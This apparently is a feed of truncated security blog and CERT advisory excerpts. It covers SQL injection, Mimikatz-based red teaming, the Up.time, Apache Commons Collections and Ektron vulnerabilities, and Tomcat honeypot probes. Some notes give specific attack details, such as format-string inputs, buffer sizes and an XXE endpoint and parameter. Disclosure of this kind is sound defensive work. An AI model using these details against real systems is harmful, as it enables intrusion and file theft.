Although a lot has been written about SQL injection vulnerabilities, they can still be found relatively often. In most of the cases Ive seen in last couple of years, I had to deal with blind SQL injection vulnerabilities
The following is a cross-posted from HolisticInfoSec . Happy New Year and welcome to 2016! When last we explored red team versus blue team tactics in May 2015 , we utilizedInvoke-Mimikatz, then reviewed and analyzed a victim with WinPmem and Rekall.
Vulnerability Note VU#377260 Up.time agent for Windows contains multiple vulnerabilities Original Release date: 08 Dec 2015 | Last revised: 08 Dec 2015 Overview The Up.time client for Windows is vulnerable to an format string attack as well as a buffer overflow, and may allow unauthenticated users to perform certain commands. Description CWE-134 : Uncontrolled Format String – CVE-2015-2894 For version 6.0 and 7.2, an unauthenticated attacker on the network may send either the ” %n ” or ” %s ” format parameters will cause the application to crash. CWE-120 : Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’) – CVE-2015-2895 For version 7.4, an unauthenticated attacker on the network sending commands with an input that is larger than 1024 bytes will crash the application.
Vulnerability Note VU#576313 Apache Commons Collections Java library insecurely deserializes data Original Release date: 13 Nov 2015 | Last revised: 13 Nov 2015 Overview The Apache Commons Collections (ACC) library is vulnerable to insecure deserialization of data, which may result in arbitrary code execution.
On a quiet, rainy Sunday I would like to talk about NIST 800-12, “> . I am sharing this to help raise awareness, as much for our regular supporters, but also for those around us who may not fully grok the whole of a computer security program
The last couple of days, a paper with details about XARA vulnerabilities in OS X and iOS is getting a lot of attention . If you havent seen the term XARA before, then this is probably because cross-application-resource-access was normal in the past.
Last month, I blogged about security researcher Chris Roberts being detained by the FBI after tweeting about avionics security while on a United flight: But to me, the fascinating part of this story is that a computer was monitoring the Twitter feed and understood the obscure references, alerted a person who figured out who wrote them, researched what flight he was on, and sent an FBI team to the Syracuse airport within a couple of hours. There’s some serious surveillance going on. We know a lot more of the back story from the FBI’s warrant application .
In our honeypots, we recently saw a spike of requests for http://[ip address]:8080/manager/html . These requests appear to target the Apache Tomcat server. In case you havent heard of Tomcat before (unlikely): It is a Java Servlet and JavaServer Pages technology .
Vulnerability Note VU#377644 Ektron Content Management System (CMS) contains multiple vulnerabilities Original Release date: 05 Feb 2015 | Last revised: 05 Feb 2015 Overview Ektron Content Management System (CMS) versions 8.5, 8.7, and 9.1 contain a XXE and a resource injection vulnerability. Description CWE-611 : Improper Restriction of XML External Entity Reference (‘XXE’) – CVE-2015-0923 Ektron Content Management System version 8.5, 8.7, and 9.1 contain a XXE vulnerability in /Workarea/ServerControlWS.asmx. The parameter xslt of the method ContentBlockEx allows a remote unauthenticated user to read arbitrary files